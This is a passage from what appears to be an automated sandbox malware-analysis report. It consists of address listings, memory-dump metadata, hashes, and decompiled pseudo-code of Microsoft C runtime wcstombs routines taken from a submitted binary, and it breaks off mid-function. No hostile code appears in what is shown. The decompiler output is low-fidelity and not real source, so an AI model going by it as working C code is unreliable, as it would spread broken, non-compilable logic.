                            0x00423985
                            0x0042398d
                            0x0042398e
                            0x0042398f
                            0x00423995
                            0x00423995
                            0x004239b9
                            0x00423954
                            0x00423954
                            0x00423960
                            0x00423966
                            0x00423966
                            0x0042392c
                            0x0042392c
                            0x00423938
                            0x0042393e
                            0x0042393e
                            0x004239fb
                            0x004239fb
                            0x004239fe
                            0x00000000
                            0x00000000
                            0x00000000
                            0x004235fa
                            0x004235fa
                            0x00423606
                            0x0042360c
                            0x00423611
                            0x00423613
                            0x004236bd
                            0x004236bd
                            0x004236c0
                            0x004236c0
                            0x004236c3
                            0x004236d7
                            0x004236dd
                            0x004236e3
                            0x004236c5
                            0x004236c5
                            0x004236cb
                            0x004236d2
                            0x004236d2
                            0x004236e5
                            0x00423bb0
                            0x00423bb0
                            0x00423bb0
                            0x00423bb4
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00423bb4
                            0x00423bb0
                            0x00423619
                            0x00423619
                            0x00423619
                            0x0042361b
                            0x00423629
                            0x0042361d
                            0x0042361d
                            0x0042361d
                            0x00423633
                            0x00423639
                            0x0042363f
                            0x00423646
                            0x00423648
                            0x0042364d
                            0x0042364f
                            0x00423654
                            0x00423659
                            0x0042365b
                            0x00423660
                            0x00423663
                            0x00423666
                            0x00423668
                            0x00423668
                            0x00423666
                            0x00423669
                            0x00423670
                            0x004236b8
                            0x00423bb0
                            0x00423bb0
                            0x00423bb0
                            0x00423bb4
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00423bb4
                            0x00423672
                            0x00423672
                            0x00423677
                            0x00423693
                            0x0042369b
                            0x004236a5
                            0x004236a8
                            0x004236ad
                            0x00000000
                            0x004236ad
                            0x00000000
                            0x00423904
                            0x00423904
                            0x0042390e
                            0x0042390e
                            0x00423914
                            0x00423916
                            0x00423919
                            0x00423919
                            0x0042391f
                            0x0042391f
                            0x00423922
                            0x00423922
                            0x00423925
                            0x00423925
                            0x0042392a
                            0x0042394c
                            0x0042394c
                            0x00423952
                            0x00423974
                            0x00423974
                            0x00423977
                            0x004239be
                            0x004239be
                            0x004239c1
                            0x004239de
                            0x004239e2
                            0x004239ea
                            0x004239ea
                            0x004239ec
                            0x004239f2
                            0x004239c3
                            0x004239c3
                            0x004239c7
                            0x004239cf
                            0x004239d0
                            0x004239d6
                            0x004239d6
                            0x00423979
                            0x0042397c
                            0x0042397c
                            0x0042397f
                            0x0042399d
                            0x004239a9
                            0x004239ac
                            0x004239ad
                            0x004239b3
                            0x00423981
                            0x00423981
                            0x00423985
                            0x0042398d
                            0x0042398e
                            0x0042398f
                            0x00423995
                            0x00423995
                            0x004239b9
                            0x00423954
                            0x00423954
                            0x00423960
                            0x00423966
                            0x00423966
                            0x0042392c
                            0x0042392c
                            0x00423938
                            0x0042393e
                            0x0042393e
                            0x004239fb
                            0x004239fb
                            0x004239fe
                            0x00000000
                            0x00000000
                            0x00000000
                            0x004239fe
                            0x00000000
                            0x004238b6
                            0x004238b6
                            0x00000000
                            0x00000000
                            0x004234cd
                            0x004234cd
                            0x004234d1
                            0x004234df
                            0x004234e2
                            0x004234d3
                            0x004234d3
                            0x004234d3
                            0x004234e8
                            0x004234ee
                            0x004234f4
                            0x00423500
                            0x00423506
                            0x00423506
                            0x00423509
                            0x00423591
                            0x00423591
                            0x00423595
                            0x00423597
                            0x0042359d
                            0x0042359d
                            0x004235a0
                            0x004235a7
                            0x004235aa
                            0x004235b0
                            0x004235b0
                            0x004235b0
                            0x004235b6
                            0x004235bc
                            0x004235bf
                            0x004235c5
                            0x004235c7
                            0x00000000
                            0x00000000
                            0x004235c9
                            0x004235c9
                            0x004235cf
                            0x004235d2
                            0x004235d4
                            0x00000000
                            0x00000000
                            0x004235d6
                            0x004235dc
                            0x004235df
                            0x004235df
                            0x004235e7
                            0x004235e7
                            0x004235ed
                            0x004235ed
                            0x004235f2
                            0x00000000
                            0x0042350f
                            0x0042350f
                            0x0042350f
                            0x00423513
                            0x00423515
                            0x0042351a
                            0x0042351a
                            0x0042351d
                            0x00423520
                            0x00423526
                            0x00423538
                            0x00423538
                            0x00423538
                            0x0042353b
                            0x00423541
                            0x00000000
                            0x00000000
                            0x00423543
                            0x00423543
                            0x00423549
                            0x0042354c
                            0x0042354e
                            0x00000000
                            0x00000000
                            0x00423550
                            0x00423550
                            0x00423559
                            0x0042355f
                            0x00423563
                            0x0042356b
                            0x0042356d
                            0x0042356f
                            0x00423575
                            0x00423575
                            0x00423578
                            0x00423578
                            0x00423584
                            0x00423587
                            0x0042352f
                            0x00423532
                            0x00423532
                            0x00423535
                            0x00423535
                            0x0042358f
                            0x004235f5
                            0x00423bb0
                            0x00423bb0
                            0x00423bb0
                            0x00423bb4
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00423bb4
                            0x00423bb0
                            0x00000000
                            0x004238ad
                            0x004238ad
                            0x00423922
                            0x00423922
                            0x00423925
                            0x00423925
                            0x0042392a
                            0x0042394c
                            0x0042394c
                            0x00423952
                            0x00423974
                            0x00423974
                            0x00423977
                            0x004239be
                            0x004239be
                            0x004239c1
                            0x004239de
                            0x004239e2
                            0x004239ea
                            0x004239ea
                            0x004239ec
                            0x004239f2
                            0x004239c3
                            0x004239c3
                            0x004239c7
                            0x004239cf
                            0x004239d0
                            0x004239d6
                            0x004239d6
                            0x00423979
                            0x0042397c
                            0x0042397c
                            0x0042397f
                            0x0042399d
                            0x004239a9
                            0x004239ac
                            0x004239ad
                            0x004239b3
                            0x00423981
                            0x00423981
                            0x00423985
                            0x0042398d
                            0x0042398e
                            0x0042398f
                            0x00423995
                            0x00423995
                            0x004239b9
                            0x00423954
                            0x00423954
                            0x00423960
                            0x00423966
                            0x00423966
                            0x0042392c
                            0x0042392c
                            0x00423938
                            0x0042393e
                            0x0042393e
                            0x004239fb
                            0x004239fb
                            0x004239fe
                            0x00000000
                            0x00000000
                            0x00000000
                            0x004239fe
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00423bb0
                            0x00423bb0
                            0x00423bb0
                            0x00423bb4
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00423bb4
                            0x00000000
                            0x00000000
                            0x00423139
                            0x00423139
                            0x0042313c
                            0x0042313f
                            0x00000000
                            0x00000000
                            0x00423144
                            0x00423147
                            0x0042314d
                            0x00000000
                            0x00000000
                            0x0042312e
                            0x00423131
                            0x00423134
                            0x00000000
                            0x00000000
                            0x00423123
                            0x00423126
                            0x00423129
                            0x00000000
                            0x00000000
                            0x00423152
                            0x00423152
                            0x00423155
                            0x00423155
                            0x00423158
                            0x00000000
                            0x00000000
                            0x0042315b
                            0x00000000
                            0x00000000
                            0x00422fcb
                            0x00422fcb
                            0x00422fcd
                            0x00422fdb
                            0x00422fcf
                            0x00422fcf
                            0x00422fcf
                            0x00422feb
                            0x00422ff8
                            0x00422ffa
                            0x00422fff
                            0x00423001
                            0x00423006
                            0x0042300b
                            0x0042300d
                            0x00423012
                            0x00423018
                            0x0042301a
                            0x0042301a
                            0x00423018
                            0x0042301b
                            0x00423022
                            0x00000000
                            0x00423024
                            0x00423029
                            0x00423045
                            0x0042304d
                            0x0042305a
                            0x0042305f
                            0x00423e74
                            0x00423e81
                            0x00423e81
                            0x00423022
                            0x00422fc5
                            0x00423db0
                            0x00423db0
                            0x00423db7
                            0x00423dce
                            0x00423dce
                            0x00423dd8
                            0x00423dd8
                            0x00423dde
                            0x00423de4
                            0x00423deb
                            0x00423ded
                            0x00423df2
                            0x00423df4
                            0x00423df9
                            0x00423dfe
                            0x00423e00
                            0x00423e05
                            0x00423e08
                            0x00423e0b
                            0x00423e0d
                            0x00423e0d
                            0x00423e0b
                            0x00423e0e
                            0x00423e15
                            0x00423e60
                            0x00423e69
                            0x00423e6e
                            0x00423e17
                            0x00423e1c
                            0x00423e38
                            0x00423e40
                            0x00423e4d
                            0x00423e52
                            0x00423e52
                            0x00000000
                            0x00423e15
                            0x00423db9
                            0x00423db9
                            0x00423dc0
                            0x00000000
                            0x00000000
                            0x00423dc2
                            0x00423dc2
                            0x00000000
                            0x00423dc2
                            0x00423bb0
                            0x00423b87
                            0x00423b87
                            0x00423b8b
                            0x00423b98
                            0x00423b9b
                            0x00423b9e
                            0x00423ba1
                            0x00423ba4
                            0x00423ba7
                            0x00423baa
                            0x00423baa
                            0x00423bad
                            0x00000000
                            0x00423bad
                            0x00423b8d
                            0x00423b8d
                            0x00423b90
                            0x00423b93
                            0x00423b96
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00423b96
                            0x00423aec
                            0x00423aec
                            0x00423aef
                            0x00423af2
                            0x00423af9
                            0x00423b00
                            0x00423b08
                            0x00423b0e
                            0x00423b11
                            0x00423b14
                            0x00423b1b
                            0x00423b27
                            0x00423b2d
                            0x00423b33
                            0x00423b3a
                            0x00423b3c
                            0x00423b42
                            0x00423b42
                            0x00423b48
                            0x00423b48
                            0x00423b4e
                            0x00423b57
                            0x00423b5c
                            0x00423b5f
                            0x00423ace
                            0x00423ace
                            0x00423ad4
                            0x00423ad7
                            0x00423ada
                            0x00423adc
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00423adc
                            0x00423ace
                            0x00423a0b
                            0x00423a0b
                            0x00423a12
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00423a40
                            0x00423a40
                            0x00423a46
                            0x00423a4c
                            0x00423a52
                            0x00000000
                            0x00423a52
                            0x00423922
                            0x004238d3

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.254379313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.254298173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.254460883.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255654257.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255687103.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255765961.0000000000635000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_mzQcZawXvh.jbxd
                            Similarity
                            • API ID: __aulldiv__aullrem_get_int64_arg
                            • String ID: '$9
                            • API String ID: 3120068967-1823400153
                            • Opcode ID: bc6f1498b81e1650b0d75e935251ffcd63d470709da9179bfdeb0256e759645e
                            • Instruction ID: 5e4b9bb586468828394977b9d1de0a10ad833fbeca2e10dab82a2f35c21ea91e
                            • Opcode Fuzzy Hash: bc6f1498b81e1650b0d75e935251ffcd63d470709da9179bfdeb0256e759645e
                            • Instruction Fuzzy Hash: DD4116B1E101299FDB24CF48D881BAEB7B5FF85315F5040AAE289AB241C7785E81CF59
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 58%
                            			E0041E053(void* __ebx, void* __esi) {
                            				signed int _t74;
                            				intOrPtr _t75;
                            				void* _t80;
                            				signed int _t84;
                            				void* _t92;
                            				void* _t97;
                            				signed int _t106;
                            				signed int _t108;
                            				signed int _t112;
                            				signed int _t113;
                            				intOrPtr _t114;
                            				signed int _t117;
                            				signed int _t119;
                            				signed int _t125;
                            				void* _t127;
                            				void* _t128;
                            				void* _t129;
                            				void* _t131;
                            				void* _t132;
                            				void* _t140;
                            
                            				_t128 = __esi;
                            				_t97 = __ebx;
                            				_t113 =  *(_t129 + 0xc);
                            				 *_t113 = 0;
                            				if( *(_t129 + 0x10) != 0xffffffff &&  *(_t129 + 0x10) != 0x7fffffff &&  *(_t129 + 0x10) > 1) {
                            					_t140 =  *0x60a658 -  *(_t129 + 0x10) - 1; // 0xffffffff
                            					if(_t140 >= 0) {
                            						_t113 =  *(_t129 + 0x10) - 1;
                            						__eflags = _t113;
                            						 *(_t129 - 0x20) = _t113;
                            					} else {
                            						_t112 =  *0x60a658; // 0xffffffff
                            						 *(_t129 - 0x20) = _t112;
                            					}
                            					E00412D20(_t127,  *(_t129 + 0xc) + 1, 0xfe,  *(_t129 - 0x20));
                            					_t131 = _t131 + 0xc;
                            				}
                            				if( *(_t129 + 8) != 0) {
                            					_t113 =  *(_t129 + 8);
                            					 *_t113 = 0;
                            				}
                            				if( *(_t129 + 0x18) <=  *(_t129 + 0x10)) {
                            					_t113 =  *(_t129 + 0x18);
                            					 *(_t129 - 0x24) = _t113;
                            				} else {
                            					 *(_t129 - 0x24) =  *(_t129 + 0x10);
                            				}
                            				 *(_t129 - 8) =  *(_t129 - 0x24);
                            				asm("sbb edx, edx");
                            				_t114 = _t113 + 1;
                            				 *((intOrPtr*)(_t129 - 0x14)) = _t114;
                            				if(_t114 == 0) {
                            					_push(L"bufferSize <= INT_MAX");
                            					_push(0);
                            					_push(0x13f);
                            					_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\wcstombs.c");
                            					_push(2);
                            					_t92 = L0040E1A0();
                            					_t131 = _t131 + 0x14;
                            					if(_t92 == 1) {
                            						asm("int3");
                            					}
                            				}
                            				if( *((intOrPtr*)(_t129 - 0x14)) != 0) {
                            					_t100 =  *(_t129 + 0xc);
                            					_t74 = L0041DAC0(_t97,  *(_t129 - 8), _t127, _t128,  *(_t129 + 0xc),  *((intOrPtr*)(_t129 + 0x14)),  *(_t129 - 8),  *((intOrPtr*)(_t129 + 0x1c)));
                            					_t132 = _t131 + 0x10;
                            					 *(_t129 - 0xc) = _t74;
                            					__eflags =  *(_t129 - 0xc) - 0xffffffff;
                            					if( *(_t129 - 0xc) != 0xffffffff) {
                            						_t117 =  *(_t129 - 0xc) + 1;
                            						 *(_t129 - 0xc) = _t117;
                            						__eflags =  *(_t129 + 0xc);
                            						if( *(_t129 + 0xc) == 0) {
                            							L45:
                            							__eflags =  *(_t129 + 8);
                            							if( *(_t129 + 8) != 0) {
                            								 *( *(_t129 + 8)) =  *(_t129 - 0xc);
                            							}
                            							_t75 =  *((intOrPtr*)(_t129 - 4));
                            							goto L48;
                            						}
                            						__eflags =  *(_t129 - 0xc) -  *(_t129 + 0x10);
                            						if( *(_t129 - 0xc) <=  *(_t129 + 0x10)) {
                            							L44:
                            							_t119 =  *(_t129 + 0xc) +  *(_t129 - 0xc);
                            							__eflags = _t119;
                            							 *((char*)(_t119 - 1)) = 0;
                            							goto L45;
                            						}
                            						__eflags =  *(_t129 + 0x18) - 0xffffffff;
                            						if( *(_t129 + 0x18) == 0xffffffff) {
                            							L43:
                            							 *(_t129 - 0xc) =  *(_t129 + 0x10);
                            							 *((intOrPtr*)(_t129 - 4)) = 0x50;
                            							goto L44;
                            						}
                            						 *( *(_t129 + 0xc)) = 0;
                            						__eflags =  *(_t129 + 0x10) - 0xffffffff;
                            						if( *(_t129 + 0x10) != 0xffffffff) {
                            							__eflags =  *(_t129 + 0x10) - 0x7fffffff;
                            							if( *(_t129 + 0x10) != 0x7fffffff) {
                            								__eflags =  *(_t129 + 0x10) - 1;
                            								if( *(_t129 + 0x10) > 1) {
                            									__eflags =  *0x60a658 -  *(_t129 + 0x10) - 1; // 0xffffffff
                            									if(__eflags >= 0) {
                            										_t106 =  *(_t129 + 0x10) - 1;
                            										__eflags = _t106;
                            										 *(_t129 - 0x2c) = _t106;
                            									} else {
                            										_t84 =  *0x60a658; // 0xffffffff
                            										 *(_t129 - 0x2c) = _t84;
                            									}
                            									_t117 =  *(_t129 - 0x2c);
                            									__eflags =  *(_t129 + 0xc) + 1;
                            									E00412D20(_t127,  *(_t129 + 0xc) + 1, 0xfe, _t117);
                            									_t132 = _t132 + 0xc;
                            								}
                            							}
                            						}
                            						_t104 =  *(_t129 + 0x10);
                            						__eflags =  *(_t129 - 0xc) -  *(_t129 + 0x10);
                            						asm("sbb edx, edx");
                            						 *(_t129 - 0x18) =  ~_t117;
                            						if( *(_t129 - 0xc) ==  *(_t129 + 0x10)) {
                            							_push(L"sizeInBytes > retsize");
                            							_push(0);
                            							_push(0x157);
                            							_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\wcstombs.c");
                            							_push(2);
                            							_t80 = L0040E1A0();
                            							_t132 = _t132 + 0x14;
                            							__eflags = _t80 - 1;
                            							if(_t80 == 1) {
                            								asm("int3");
                            							}
                            						}
                            						__eflags =  *(_t129 - 0x18);
                            						if( *(_t129 - 0x18) != 0) {
                            							goto L43;
                            						} else {
                            							 *((intOrPtr*)(L0040EC70(_t104))) = 0x22;
                            							E00411A50(_t97, _t104, _t127, _t128, L"sizeInBytes > retsize", L"_wcstombs_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\wcstombs.c", 0x157, 0);
                            							_t75 = 0x22;
                            							goto L48;
                            						}
                            					} else {
                            						__eflags =  *(_t129 + 0xc);
                            						if( *(_t129 + 0xc) != 0) {
                            							 *( *(_t129 + 0xc)) = 0;
                            							__eflags =  *(_t129 + 0x10) - 0xffffffff;
                            							if( *(_t129 + 0x10) != 0xffffffff) {
                            								__eflags =  *(_t129 + 0x10) - 0x7fffffff;
                            								if( *(_t129 + 0x10) != 0x7fffffff) {
                            									__eflags =  *(_t129 + 0x10) - 1;
                            									if( *(_t129 + 0x10) > 1) {
                            										__eflags =  *0x60a658 -  *(_t129 + 0x10) - 1; // 0xffffffff
                            										if(__eflags >= 0) {
                            											_t125 =  *(_t129 + 0x10) - 1;
                            											__eflags = _t125;
                            											 *(_t129 - 0x28) = _t125;
                            										} else {
                            											_t108 =  *0x60a658; // 0xffffffff
                            											 *(_t129 - 0x28) = _t108;
                            										}
                            										_t100 =  *(_t129 + 0xc) + 1;
                            										__eflags =  *(_t129 + 0xc) + 1;
                            										E00412D20(_t127,  *(_t129 + 0xc) + 1, 0xfe,  *(_t129 - 0x28));
                            									}
                            								}
                            							}
                            						}
                            						_t75 =  *((intOrPtr*)(L0040EC70(_t100)));
                            						L48:
                            						return _t75;
                            					}
                            				}
                            				 *((intOrPtr*)(L0040EC70(0x7fffffff))) = 0x16;
                            				E00411A50(_t97, 0x7fffffff, _t127, _t128, L"bufferSize <= INT_MAX", L"_wcstombs_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\wcstombs.c", 0x13f, 0);
                            				_t75 = 0x16;
                            				goto L48;
                            			}























                            0x0041e053
                            0x0041e053
                            0x0041e053
                            0x0041e056
                            0x0041e05d
                            0x0041e074
                            0x0041e07a
                            0x0041e08a
                            0x0041e08a
                            0x0041e08d
                            0x0041e07c
                            0x0041e07c
                            0x0041e082
                            0x0041e082
                            0x0041e0a0
                            0x0041e0a5
                            0x0041e0a5
                            0x0041e0ac
                            0x0041e0ae
                            0x0041e0b1
                            0x0041e0b1
                            0x0041e0bd
                            0x0041e0c7
                            0x0041e0ca
                            0x0041e0bf
                            0x0041e0c2
                            0x0041e0c2
                            0x0041e0d0
                            0x0041e0db
                            0x0041e0dd
                            0x0041e0e0
                            0x0041e0e3
                            0x0041e0e5
                            0x0041e0ea
                            0x0041e0ec
                            0x0041e0f1
                            0x0041e0f6
                            0x0041e0f8
                            0x0041e0fd
                            0x0041e103
                            0x0041e105
                            0x0041e105
                            0x0041e103
                            0x0041e10a
                            0x0041e14b
                            0x0041e14f
                            0x0041e154
                            0x0041e157
                            0x0041e15a
                            0x0041e15e
                            0x0041e1ca
                            0x0041e1cd
                            0x0041e1d0
                            0x0041e1d4
                            0x0041e2c1
                            0x0041e2c1
                            0x0041e2c5
                            0x0041e2cd
                            0x0041e2cd
                            0x0041e2cf
                            0x00000000
                            0x0041e2cf
                            0x0041e1dd
                            0x0041e1e0
                            0x0041e2b7
                            0x0041e2ba
                            0x0041e2ba
                            0x0041e2bd
                            0x00000000
                            0x0041e2bd
                            0x0041e1e6
                            0x0041e1ea
                            0x0041e2aa
                            0x0041e2ad
                            0x0041e2b0
                            0x00000000
                            0x0041e2b0
                            0x0041e1f3
                            0x0041e1f6
                            0x0041e1fa
                            0x0041e1fc
                            0x0041e203
                            0x0041e205
                            0x0041e209
                            0x0041e211
                            0x0041e217
                            0x0041e226
                            0x0041e226
                            0x0041e229
                            0x0041e219
                            0x0041e219
                            0x0041e21e
                            0x0041e21e
                            0x0041e22c
                            0x0041e238
                            0x0041e23c
                            0x0041e241
                            0x0041e241
                            0x0041e209
                            0x0041e203
                            0x0041e244
                            0x0041e247
                            0x0041e24a
                            0x0041e24e
                            0x0041e251
                            0x0041e253
                            0x0041e258
                            0x0041e25a
                            0x0041e25f
                            0x0041e264
                            0x0041e266
                            0x0041e26b
                            0x0041e26e
                            0x0041e271
                            0x0041e273
                            0x0041e273
                            0x0041e271
                            0x0041e274
                            0x0041e278
                            0x00000000
                            0x0041e27a
                            0x0041e27f
                            0x0041e29b
                            0x0041e2a3
                            0x00000000
                            0x0041e2a3
                            0x0041e160
                            0x0041e160
                            0x0041e164
                            0x0041e169
                            0x0041e16c
                            0x0041e170
                            0x0041e172
                            0x0041e179
                            0x0041e17b
                            0x0041e17f
                            0x0041e187
                            0x0041e18d
                            0x0041e19d
                            0x0041e19d
                            0x0041e1a0
                            0x0041e18f
                            0x0041e18f
                            0x0041e195
                            0x0041e195
                            0x0041e1af
                            0x0041e1af
                            0x0041e1b3
                            0x0041e1b8
                            0x0041e17f
                            0x0041e179
                            0x0041e170
                            0x0041e1c0
                            0x0041e2d2
                            0x0041e2d5
                            0x0041e2d5
                            0x0041e15e
                            0x0041e111
                            0x0041e12d
                            0x0041e135
                            0x00000000

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.254379313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.254298173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.254460883.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255654257.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255687103.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255765961.0000000000635000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_mzQcZawXvh.jbxd
                            Similarity
                            • API ID: __invalid_parameter_memset
                            • String ID: _wcstombs_s_l$bufferSize <= INT_MAX$f:\dd\vctools\crt_bld\self_x86\crt\src\wcstombs.c
                            • API String ID: 3961059608-322421350
                            • Opcode ID: 4d0d3e82a9ae9f2ef26ca1acc7f3abb43d3bd69333be4a9d56cab55e0e229715
                            • Instruction ID: 6b707857749dd023e4c6af6a08091dc1fd03571c8efcd6bfc4c46db3db2cbe2a
                            • Opcode Fuzzy Hash: 4d0d3e82a9ae9f2ef26ca1acc7f3abb43d3bd69333be4a9d56cab55e0e229715
                            • Instruction Fuzzy Hash: C321B234E403499BDB24CF55CC45BEE7BA1FB54314F24466AEC152B3C0C3BA9A90CB5A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 52%
                            			E0041DFC5(void* __ebx, void* __ecx, void* __edi, void* __esi) {
                            				signed int _t85;
                            				intOrPtr _t86;
                            				void* _t91;
                            				signed int _t95;
                            				void* _t103;
                            				void* _t110;
                            				void* _t111;
                            				void* _t112;
                            				signed int _t121;
                            				signed int _t123;
                            				signed int _t127;
                            				signed int _t128;
                            				signed int _t129;
                            				signed int _t132;
                            				signed int _t134;
                            				signed int _t140;
                            				void* _t142;
                            				void* _t143;
                            				void* _t144;
                            				void* _t146;
                            				void* _t147;
                            
                            				_t143 = __esi;
                            				_t142 = __edi;
                            				_t112 = __ecx;
                            				_t111 = __ebx;
                            				if( *(_t144 + 0x10) > 0 ||  *(_t144 + 0xc) == 0 &&  *(_t144 + 0x10) == 0) {
                            					 *((intOrPtr*)(_t144 - 0x1c)) = 1;
                            				} else {
                            					 *((intOrPtr*)(_t144 - 0x1c)) = 0;
                            				}
                            				 *((intOrPtr*)(_t144 - 0x10)) =  *((intOrPtr*)(_t144 - 0x1c));
                            				if( *((intOrPtr*)(_t144 - 0x10)) == 0) {
                            					_push(L"(dst != NULL && sizeInBytes > 0) || (dst == NULL && sizeInBytes == 0)");
                            					_push(0);
                            					_push(0x133);
                            					_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\wcstombs.c");
                            					_push(2);
                            					_t110 = L0040E1A0();
                            					_t146 = _t146 + 0x14;
                            					if(_t110 == 1) {
                            						asm("int3");
                            					}
                            				}
                            				if( *((intOrPtr*)(_t144 - 0x10)) != 0) {
                            					__eflags =  *(_t144 + 0xc);
                            					if( *(_t144 + 0xc) != 0) {
                            						_t128 =  *(_t144 + 0xc);
                            						 *_t128 = 0;
                            						__eflags =  *(_t144 + 0x10) - 0xffffffff;
                            						if( *(_t144 + 0x10) != 0xffffffff) {
                            							__eflags =  *(_t144 + 0x10) - 0x7fffffff;
                            							if( *(_t144 + 0x10) != 0x7fffffff) {
                            								__eflags =  *(_t144 + 0x10) - 1;
                            								if( *(_t144 + 0x10) > 1) {
                            									__eflags =  *0x60a658 -  *(_t144 + 0x10) - 1; // 0xffffffff
                            									if(__eflags >= 0) {
                            										_t128 =  *(_t144 + 0x10) - 1;
                            										__eflags = _t128;
                            										 *(_t144 - 0x20) = _t128;
                            									} else {
                            										_t127 =  *0x60a658; // 0xffffffff
                            										 *(_t144 - 0x20) = _t127;
                            									}
                            									__eflags =  *(_t144 + 0xc) + 1;
                            									E00412D20(_t142,  *(_t144 + 0xc) + 1, 0xfe,  *(_t144 - 0x20));
                            									_t146 = _t146 + 0xc;
                            								}
                            							}
                            						}
                            					}
                            					__eflags =  *(_t144 + 8);
                            					if( *(_t144 + 8) != 0) {
                            						_t128 =  *(_t144 + 8);
                            						 *_t128 = 0;
                            					}
                            					__eflags =  *(_t144 + 0x18) -  *(_t144 + 0x10);
                            					if( *(_t144 + 0x18) <=  *(_t144 + 0x10)) {
                            						_t128 =  *(_t144 + 0x18);
                            						 *(_t144 - 0x24) = _t128;
                            					} else {
                            						 *(_t144 - 0x24) =  *(_t144 + 0x10);
                            					}
                            					 *(_t144 - 8) =  *(_t144 - 0x24);
                            					__eflags = 0x7fffffff -  *(_t144 - 8);
                            					asm("sbb edx, edx");
                            					_t129 = _t128 + 1;
                            					__eflags = _t129;
                            					 *(_t144 - 0x14) = _t129;
                            					if(_t129 == 0) {
                            						_push(L"bufferSize <= INT_MAX");
                            						_push(0);
                            						_push(0x13f);
                            						_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\wcstombs.c");
                            						_push(2);
                            						_t103 = L0040E1A0();
                            						_t146 = _t146 + 0x14;
                            						__eflags = _t103 - 1;
                            						if(_t103 == 1) {
                            							asm("int3");
                            						}
                            					}
                            					__eflags =  *(_t144 - 0x14);
                            					if( *(_t144 - 0x14) != 0) {
                            						_t115 =  *(_t144 + 0xc);
                            						_t85 = L0041DAC0(_t111,  *(_t144 - 8), _t142, _t143,  *(_t144 + 0xc),  *((intOrPtr*)(_t144 + 0x14)),  *(_t144 - 8),  *((intOrPtr*)(_t144 + 0x1c)));
                            						_t147 = _t146 + 0x10;
                            						 *(_t144 - 0xc) = _t85;
                            						__eflags =  *(_t144 - 0xc) - 0xffffffff;
                            						if( *(_t144 - 0xc) != 0xffffffff) {
                            							_t132 =  *(_t144 - 0xc) + 1;
                            							 *(_t144 - 0xc) = _t132;
                            							__eflags =  *(_t144 + 0xc);
                            							if( *(_t144 + 0xc) == 0) {
                            								L56:
                            								__eflags =  *(_t144 + 8);
                            								if( *(_t144 + 8) != 0) {
                            									 *( *(_t144 + 8)) =  *(_t144 - 0xc);
                            								}
                            								_t86 =  *((intOrPtr*)(_t144 - 4));
                            								goto L59;
                            							}
                            							__eflags =  *(_t144 - 0xc) -  *(_t144 + 0x10);
                            							if( *(_t144 - 0xc) <=  *(_t144 + 0x10)) {
                            								L55:
                            								_t134 =  *(_t144 + 0xc) +  *(_t144 - 0xc);
                            								__eflags = _t134;
                            								 *((char*)(_t134 - 1)) = 0;
                            								goto L56;
                            							}
                            							__eflags =  *(_t144 + 0x18) - 0xffffffff;
                            							if( *(_t144 + 0x18) == 0xffffffff) {
                            								L54:
                            								 *(_t144 - 0xc) =  *(_t144 + 0x10);
                            								 *((intOrPtr*)(_t144 - 4)) = 0x50;
                            								goto L55;
                            							}
                            							 *( *(_t144 + 0xc)) = 0;
                            							__eflags =  *(_t144 + 0x10) - 0xffffffff;
                            							if( *(_t144 + 0x10) != 0xffffffff) {
                            								__eflags =  *(_t144 + 0x10) - 0x7fffffff;
                            								if( *(_t144 + 0x10) != 0x7fffffff) {
                            									__eflags =  *(_t144 + 0x10) - 1;
                            									if( *(_t144 + 0x10) > 1) {
                            										__eflags =  *0x60a658 -  *(_t144 + 0x10) - 1; // 0xffffffff
                            										if(__eflags >= 0) {
                            											_t121 =  *(_t144 + 0x10) - 1;
                            											__eflags = _t121;
                            											 *(_t144 - 0x2c) = _t121;
                            										} else {
                            											_t95 =  *0x60a658; // 0xffffffff
                            											 *(_t144 - 0x2c) = _t95;
                            										}
                            										_t132 =  *(_t144 - 0x2c);
                            										__eflags =  *(_t144 + 0xc) + 1;
                            										E00412D20(_t142,  *(_t144 + 0xc) + 1, 0xfe, _t132);
                            										_t147 = _t147 + 0xc;
                            									}
                            								}
                            							}
                            							_t119 =  *(_t144 + 0x10);
                            							__eflags =  *(_t144 - 0xc) -  *(_t144 + 0x10);
                            							asm("sbb edx, edx");
                            							 *(_t144 - 0x18) =  ~_t132;
                            							if( *(_t144 - 0xc) ==  *(_t144 + 0x10)) {
                            								_push(L"sizeInBytes > retsize");
                            								_push(0);
                            								_push(0x157);
